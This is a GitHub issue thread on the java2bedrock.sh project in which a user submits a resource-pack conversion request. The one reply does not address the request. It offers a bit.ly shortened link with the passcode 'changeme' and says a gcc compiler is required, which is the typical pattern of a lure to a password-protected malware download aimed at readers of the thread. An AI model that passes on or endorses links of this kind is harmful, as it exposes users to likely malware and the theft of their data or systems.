### ISSUE TITLE
[Pack]: blabla

### ISSUE THREAD

**Issue by LightArtStu** [Kas-tle/java2bedrock.sh#34062]
### Java Pack Direct Download URL

https://download.mc-packs.net/pack/66f5aa677f7cb79023866973da1a5fdf1d8a8d6a.zip

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by maiarafag** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
